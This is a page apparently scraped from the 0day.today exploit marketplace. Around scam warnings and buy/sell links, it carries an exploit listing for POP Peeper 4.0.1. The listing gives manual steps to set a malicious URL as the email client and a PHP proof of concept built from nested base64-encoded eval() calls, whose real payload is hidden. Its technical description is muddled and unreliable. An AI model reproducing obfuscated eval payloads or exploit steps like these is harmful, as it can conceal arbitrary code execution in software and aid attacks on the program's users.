0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
POP Peeper 4.0.1 - Persistent Code Execution Vulnerability
# Title : POP Peeper 4.0.1 - Persistent Code Execution Vulnerability # Author : ZwX # Vendor : http://www.esumsoft.com/ # Download : http://data.esumsoft.com/download/POPPeeperPro.zip # Tested On : Windows 7 # Description Vulnerability : ============================= A code execution vulnerability is located in the software POP Peeper. An attacker can download a remote program from a malicious URL is Register by default. I created a video that demonstrates how to download a software on a victim website create by the attacker. Proof Video : ============= http://zwx.fr/videos/POPPeeper.html # Manual steps to reproduce the vulnerability : =============================================== # 1. Launch POP Peeper.exe # 2. Click Tools -> Options -> General # 3. Paste malicious url in input "Email Client" # 4. Click ok and Clik Compose # 5. PHP code executed successfully # PoC Exploit : =============== <?php ####################################### # Code Execution Calculator # # By ZwX - Vulnerability Lab.com # ####################################### eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIy UmxLQ2RhV0doc1dYbG5ibEY2Y0dOV01HeFBVa1U1V0ZVeGVIcGxXRTR3V 2xjd2VrMXNlR3BaVjNocVRHMVdORnBUWTNCUGR6MDlKeWtwT3c9PScpKTs=')); ?> # 0day.today [2024-11-16] #